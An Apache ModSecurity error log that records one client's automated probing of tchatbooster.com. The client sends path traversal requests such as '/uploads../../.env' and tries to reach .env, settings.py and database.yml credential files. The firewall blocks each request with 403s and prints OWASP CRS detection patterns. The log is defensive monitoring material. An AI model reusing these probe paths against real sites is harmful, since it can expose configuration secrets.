[Tue May 12 04:40:08.828480 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKTCBfeipD4uoG21Foi0gAAAA4"]
[Tue May 12 04:40:09.269048 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTCBfeipD4uoG21Foi0gAAAA4"]
[Tue May 12 04:40:09.799120 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKTCRfeipD4uoG21Foi0wAAAA4"]
[Tue May 12 04:40:09.799360 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKTCRfeipD4uoG21Foi0wAAAA4"]
[Tue May 12 04:40:10.247740 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTCRfeipD4uoG21Foi0wAAAA4"]
[Tue May 12 04:40:10.770874 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKTChfeipD4uoG21Foi1wAAAA4"]
[Tue May 12 04:40:10.771150 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKTChfeipD4uoG21Foi1wAAAA4"]
[Tue May 12 04:40:11.228366 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTChfeipD4uoG21Foi1wAAAA4"]
[Tue May 12 04:40:11.754164 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTCxfeipD4uoG21Foi2QAAAA4"]
[Tue May 12 04:40:11.754245 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTCxfeipD4uoG21Foi2QAAAA4"]
[Tue May 12 04:40:11.754410 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTCxfeipD4uoG21Foi2QAAAA4"]
[Tue May 12 04:40:12.227532 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTCxfeipD4uoG21Foi2QAAAA4"]
[Tue May 12 04:40:12.248293 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTDAgpmE1yW0glLdgfjgAAANY"], referer: https://tchatbooster.com/uploads../../.env
[Tue May 12 04:40:12.248498 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTDAgpmE1yW0glLdgfjgAAANY"], referer: https://tchatbooster.com/uploads../../.env
[Tue May 12 04:40:12.759265 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTDAgpmE1yW0glLdgfjgAAANY"], referer: https://tchatbooster.com/uploads../../.env
[Tue May 12 04:40:12.781840 2026] [core:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] AH10244: invalid URI path (/uploads../../../.env)
[Tue May 12 04:40:13.128846 2026] [security2:error] [pid 1730207:tid 1730211] [client 43.157.191.20:48458] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agKTDTue9Sp-pIv_Bb61vQAAAUI"]
[Tue May 12 04:40:13.268358 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTDQgpmE1yW0glLdgflwAAANY"], referer: https://tchatbooster.com/uploads../../../.env
[Tue May 12 04:40:13.268584 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTDQgpmE1yW0glLdgflwAAANY"], referer: https://tchatbooster.com/uploads../../../.env
[Tue May 12 04:40:13.760872 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTDQgpmE1yW0glLdgflwAAANY"], referer: https://tchatbooster.com/uploads../../../.env
[Tue May 12 04:40:13.935256 2026] [core:error] [pid 1825287:tid 1825304] [client 45.148.10.166:16606] AH10244: invalid URI path (/uploads../../../../.env)
[Tue May 12 04:40:14.396976 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTDggpmE1yW0glLdgfmwAAANY"], referer: https://tchatbooster.com/uploads../../../../.env
[Tue May 12 04:40:14.397148 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTDggpmE1yW0glLdgfmwAAANY"], referer: https://tchatbooster.com/uploads../../../../.env
[Tue May 12 04:40:14.867224 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTDggpmE1yW0glLdgfmwAAANY"], referer: https://tchatbooster.com/uploads../../../../.env
[Tue May 12 04:40:14.932304 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTDjue9Sp-pIv_Bb61wgAAAVQ"]
[Tue May 12 04:40:14.932393 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTDjue9Sp-pIv_Bb61wgAAAVQ"]
[Tue May 12 04:40:14.932561 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTDjue9Sp-pIv_Bb61wgAAAVQ"]
[Tue May 12 04:40:15.373339 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTDjue9Sp-pIv_Bb61wgAAAVQ"]
[Tue May 12 04:40:15.390537 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTDwgpmE1yW0glLdgfnQAAANY"], referer: https://tchatbooster.com/uploads../../.env.local
[Tue May 12 04:40:15.390748 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTDwgpmE1yW0glLdgfnQAAANY"], referer: https://tchatbooster.com/uploads../../.env.local
[Tue May 12 04:40:15.874630 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTDwgpmE1yW0glLdgfnQAAANY"], referer: https://tchatbooster.com/uploads../../.env.local
[Tue May 12 04:40:15.898261 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTDzue9Sp-pIv_Bb61wwAAAVQ"]
[Tue May 12 04:40:15.898337 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTDzue9Sp-pIv_Bb61wwAAAVQ"]
[Tue May 12 04:40:15.898497 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTDzue9Sp-pIv_Bb61wwAAAVQ"]
[Tue May 12 04:40:16.347157 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTDzue9Sp-pIv_Bb61wwAAAVQ"]
[Tue May 12 04:40:16.367009 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTEAgpmE1yW0glLdgfnwAAANY"], referer: https://tchatbooster.com/uploads../../.env.production
[Tue May 12 04:40:16.367226 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTEAgpmE1yW0glLdgfnwAAANY"], referer: https://tchatbooster.com/uploads../../.env.production
